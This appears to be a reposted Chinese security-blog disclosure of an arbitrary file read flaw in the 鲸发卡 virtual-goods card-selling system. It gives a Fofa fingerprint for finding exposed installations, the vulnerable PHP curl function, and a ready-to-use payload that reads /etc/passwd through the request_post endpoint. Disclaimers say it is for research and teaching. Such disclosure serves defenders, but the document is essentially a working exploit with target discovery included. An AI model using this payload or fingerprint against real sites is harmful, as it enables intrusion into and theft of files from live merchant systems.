漏洞简介
鲸发卡系统是一款专业的虚拟商品寄售系统,支持多种功能和模式,为商户和买家提供便捷、绿色、安全、快速的销售和购买体验。本文档介绍了鲸发卡系统的特色功能、客户案例.
资产详情
Fofa:"/static/theme/maowang51/css/style.css"
漏洞分析
在 /application/pay/controller/Xinhui.php 控制器下存在curl_exec函数,并且回显,导致漏洞产生
function request_post($url = '', $post_data = array()) {if (empty($url) || empty($post_data)) {return false;}$o = "";foreach ($post_data as $k => $v) {$o .= "$k=" . urlencode($v) . "&";}$post_data = substr($o, 0, -1);$postUrl = $url;$curlPost = $post_data;$ch = curl_init(); //初始化curlcurl_setopt($ch, CURLOPT_URL, $postUrl); //抓取指定网页curl_setopt($ch, CURLOPT_HEADER, 0); //设置headercurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //要求结果为字符串且输出到屏幕上curl_setopt($ch, CURLOPT_POST, 1); //post提交方式curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // 跳过检查curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // 跳过检查$data = curl_exec($ch); //运行curlcurl_close($ch);return $data;}
漏洞复现
Payload:
/pay/xinhui/request_post?url=file:///etc/passwd&post_data[1]=aaa
免责声明
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):某全自动发卡网存在任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论